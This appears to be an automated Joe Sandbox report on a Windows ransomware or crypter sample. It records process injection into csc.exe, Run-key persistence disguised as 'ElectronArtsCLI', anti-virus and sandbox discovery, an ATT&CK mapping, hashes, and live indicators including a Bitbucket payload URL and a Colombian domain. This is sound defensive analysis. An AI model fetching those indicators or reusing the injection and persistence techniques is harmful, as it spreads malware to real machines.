              Source: Yara matchFile source: 3.2.csc.exe.9540000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.csc.exe.7ef6e08.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.3789474644.0000000009540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3786417817.0000000006CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3786964807.0000000007E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 5980, type: MEMORYSTR
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041DAB0 push 3B185E89h; ret 0_2_0041DAB9
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424366 push eax; ret 0_2_00424374
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00424376 push eax; ret 0_2_0042439C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00428B3F push ecx; ret 0_2_00428B4F
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0041CE1E push esp; ret 0_2_0041CE29
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00427E30 push eax; ret 0_2_00427E4E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093B72D1 push ebp; retf 3_2_093B737D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C453B push ecx; iretd 3_2_094C4541
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FE2F0 push esp; ret 3_2_095FE2F1
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, cGOENDByihghaE21MG5.csHigh entropy of concatenated method names: 'EdlfqAAxSq4asn4s2Ne', 'l9FwaFAwKMsJskM5SS2', 'ULWX35OtJK', 'vh0ry9Sq2v', 'FPeXBKLIcd', 'gl7X7GxgH4', 'sOAXXtNN9T', 'M2TXNQ9Hv1', 'QDRaBUYlQe', 'BxWBkkZ0es'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, EQdDeAXU1XRqnCmSnUG.csHigh entropy of concatenated method names: 'qetesG9p96', 'WDkeVsRr8A', 'SlKe22d1Hb', 'KZEe9PDBHk', 'MqMeR1vtlb', 'Syye8sGlPk', 'PKgeUBiWbF', 'WluNQUBMUd', 'XWwe10yo0k', 'JJNei3SGMf'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, DmgZfxFVftVX4nGpCf.csHigh entropy of concatenated method names: 'r1Wrl3iRT', 'F0Hj71PkP', 'ofu4PJmtE', 'dXlGX6NO4', 'ru7tII8RS', 'BJQPgbJ6f', 'jdWsRrDML', 'LsESFMgvB', 'PRHHNfsKZ', 'ibg5oNNrj'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, Ayn1bJ1VAOfw54fj8a.csHigh entropy of concatenated method names: 'gkPDTUQCf', 'd8wM3uvWR', 'SVSKAXtte', 'BpJofeCoO', 'jAlqc9L96', 'XNvZSnYtA', 'dnmvgT4pw', 'tkHp8QKmC', 'GTEO2Zu9jUdXRAfVFcE', 'iAphh7uRxLmOm9iSnyw'
              Source: 3.3.csc.exe.800ee68.1.raw.unpack, rUXBNkX62kIkdWvG3y1.csHigh entropy of concatenated method names: 'd4FX55NwX2', 'yLdXbyXX6F', 'cnwXJ0RfcX', 'eFLXfxHWyS', 'beAXsiuwgI', 'vitXVELxpD', 'oNVX2tS0EE', 'FpCX9bvyoE', 'HiFXR5l6Um', 'FHsX8OCiPO'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, IvWVBqISSAu8Lo1NXyU.csHigh entropy of concatenated method names: 'DgEIDqGKIZ', 'OWxDSrCh4etLMjhOKoG', 'T0vkkXCcJHoNqSdKNqu', 'CmEIRyy3Z3', 'uesI8d2uji', 'Ed0I5J3HRg', 'OcZIbC10tS', 'siYIJQbnPQ', 'i17IfYLvQY', 'd6KIsYxvPI'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, cGOENDByihghaE21MG5.csHigh entropy of concatenated method names: 'EdlfqAAxSq4asn4s2Ne', 'l9FwaFAwKMsJskM5SS2', 'ULWX35OtJK', 'vh0ry9Sq2v', 'FPeXBKLIcd', 'gl7X7GxgH4', 'sOAXXtNN9T', 'M2TXNQ9Hv1', 'QDRaBUYlQe', 'BxWBkkZ0es'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, EQdDeAXU1XRqnCmSnUG.csHigh entropy of concatenated method names: 'qetesG9p96', 'WDkeVsRr8A', 'SlKe22d1Hb', 'KZEe9PDBHk', 'MqMeR1vtlb', 'Syye8sGlPk', 'PKgeUBiWbF', 'WluNQUBMUd', 'XWwe10yo0k', 'JJNei3SGMf'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, DmgZfxFVftVX4nGpCf.csHigh entropy of concatenated method names: 'r1Wrl3iRT', 'F0Hj71PkP', 'ofu4PJmtE', 'dXlGX6NO4', 'ru7tII8RS', 'BJQPgbJ6f', 'jdWsRrDML', 'LsESFMgvB', 'PRHHNfsKZ', 'ibg5oNNrj'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, Ayn1bJ1VAOfw54fj8a.csHigh entropy of concatenated method names: 'gkPDTUQCf', 'd8wM3uvWR', 'SVSKAXtte', 'BpJofeCoO', 'jAlqc9L96', 'XNvZSnYtA', 'dnmvgT4pw', 'tkHp8QKmC', 'GTEO2Zu9jUdXRAfVFcE', 'iAphh7uRxLmOm9iSnyw'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, JdSXlyd2vhHvwQ3xmP9.csHigh entropy of concatenated method names: 'LVMdUEHCB6', 'ePDD9PCMjolGyjHyym1', 'EEE4ciCKSDP0VRUno9A', 'TPwdDPtMck', 'pcE7iBCq38kxBF6jxgM', 'mQDxf6CZjc8JCTEf5m5', 'KNJdRASXDY', 'axud8TWJFp', 't70YaOC1YUNwMOdWkSu', 'tAuSjKCiyyXug0mA74c'
              Source: 3.2.csc.exe.93b0000.3.raw.unpack, rUXBNkX62kIkdWvG3y1.csHigh entropy of concatenated method names: 'd4FX55NwX2', 'yLdXbyXX6F', 'cnwXJ0RfcX', 'eFLXfxHWyS', 'beAXsiuwgI', 'vitXVELxpD', 'oNVX2tS0EE', 'FpCX9bvyoE', 'HiFXR5l6Um', 'FHsX8OCiPO'
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeFile created: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLIJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00422CCA IsIconic,GetWindowPlacement,GetWindowRect,0_2_00422CCA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 4F20000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 6CD0000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: 4F70000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 399000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 599469
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 599358
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 599250
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 356000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 597890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Window / User API: threadDelayed 6082
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Window / User API: threadDelayed 3708
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Dropped PE file which has not been started: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe API coverage: 0.3 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_0042407C VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0042407C
              Source: csc.exe, 00000003.00000002.3789805471.00000000097F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll16CapabilityDescriptions
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F0000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F0000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F0000
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 60F008
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00413910 ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,GetLastError,RevertToSelf,0_2_00413910
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00422895
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: GetLocaleInfoA,0_2_00432551
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: EnumSystemLocalesA,0_2_00430605
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: EnumSystemLocalesA,0_2_0043063C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: EnumSystemLocalesA,0_2_004306C2
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,0_2_00430717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_00425CF4 GetSystemTimeAsFileTime,__aulldiv,0_2_00425CF4
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_0042D862 __lock,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0042D862
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exe Code function: 0_2_004228FA GetVersionExA,InterlockedExchange,0_2_004228FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: csc.exe, 00000003.00000002.3785994710.000000000505F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 131 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
              Credentials | Domains | Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 31 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 137 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 131 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 11 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 141 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 31 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

              Source | Detection | Scanner | Label | Link
              3XSXmrEOw7.exe | 29% | ReversingLabs | Win32.Ransomware.Generic |
              3XSXmrEOw7.exe | 100% | Avira | TR/Crypt.XPACK.Gen3 |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://crl.microsX | 0% | Avira URL Cloud | safe |
              https://bbuseruploads.s3.amazonaws | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              s3-w.us-east-1.amazonaws.com | 3.5.28.146 | true | false | | high
              bitbucket.org | 185.166.143.50 | true | false | | high
              navegacionseguracol24vip.org | 181.131.217.244 | true | false | | unknown
              s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
              bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              https://bitbucket.org/facturacioncol/fact/downloads/null.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
181.131.217.244 | navegacionseguracol24vip.org | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | false
185.166.143.50 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573895
Start date and time: 2024-12-12 17:29:16 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 3XSXmrEOw7.exe (renamed because original name is a hash value)
Original Sample Name: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce.exe
Detection: MAL
Classification: mal96.evad.winEXE@3/1@3/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 76%
• Number of executed functions: 202
• Number of non-executed functions: 122
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 3XSXmrEOw7.exe
Time | Type | Description
11:30:35 | API Interceptor | 9585273x Sleep call for process: csc.exe modified
17:30:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
17:30:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ElectronArtsCLI C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exe
                                                                                                                      • 52.30.223.81
                                                                                                                      7299_output.vbsGet hashmaliciousUnknownBrowse
                                                                                                                      • 3.78.28.71
                                                                                                                      7166_output.vbsGet hashmaliciousAsyncRATBrowse
                                                                                                                      • 18.197.239.5
                                                                                                                      phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                      • 52.219.193.160
                                                                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.126.45.88
                                                                                                                      http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                      • 52.49.166.168
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0epPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      hCJ8gK9kNn.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onionGet hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      questionable.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      3jr0P5izLl.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                      • 185.166.143.50
                                                                                                                      No context
Process: C:\Users\user\Desktop\3XSXmrEOw7.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 979567344
Entropy (8bit): 0.03700901017287011
Encrypted: false
SSDEEP:
MD5: B3CAB76A555DCC61A1FC843C15FB855B
SHA1: F83C46C8C39716DA7235DFFDD37E146A8F3F641E
SHA-256: 83C5993B56589CA2AE0B06B6F145110E36FC4406AF9CFB8ED23493175BE5467C
SHA-512: 85CB1F9A0B932E0E4F27FD8E8F2BBA145ACB357516B7A49DCEE8F021D0FBC6B4590BB141CA2849DE15481B1DDB147C2192B57A448AEC32EC9F56D16D1A334A5A
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.482858818003191
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 3XSXmrEOw7.exe
File size: 2'605'056 bytes
MD5: ddce3b9704d1e4236548b1a458317dd0
SHA1: a48a65dbcba5a65d89688e1b4eac0deef65928c8
SHA256: 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce
SHA512: 5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86
SSDEEP: 49152:WWp/hOxsZI6ezrykdIyfQxPhPR+Wa0WY44:bp/3p8r3fQBhPR+WJl
TLSH: 5FC54992A2E9C256F5F26A70D932E6F18526BCA5E935850F63D07D1F3431E818932B33
Icon Hash: 83b73111292d65c5
Entrypoint: 0x42567d
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x43A9E2E6 [Wed Dec 21 23:19:02 2005 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 1b45e9b30691181342689639e3f2a9ef
                                                                                                                      Instruction
                                                                                                                      push 00000060h
                                                                                                                      push 0044C9D0h
                                                                                                                      inc eax
                                                                                                                      inc ebx
                                                                                                                      mov eax, 00000000h
                                                                                                                      inc eax
                                                                                                                      add eax, ebx
                                                                                                                      mov eax, edi
                                                                                                                      call 00007F747CDCA744h
                                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                                      mov esi, esp
                                                                                                                      mov dword ptr [esi], edi
                                                                                                                      push esi
                                                                                                                      call dword ptr [004462D4h]
                                                                                                                      mov ecx, dword ptr [esi+10h]
                                                                                                                      mov dword ptr [00480954h], ecx
                                                                                                                      mov eax, dword ptr [esi+04h]
                                                                                                                      mov dword ptr [00480960h], eax
                                                                                                                      mov edx, dword ptr [esi+08h]
                                                                                                                      mov dword ptr [00480964h], edx
                                                                                                                      mov esi, dword ptr [esi+0Ch]
                                                                                                                      and esi, 00007FFFh
                                                                                                                      mov dword ptr [00480958h], esi
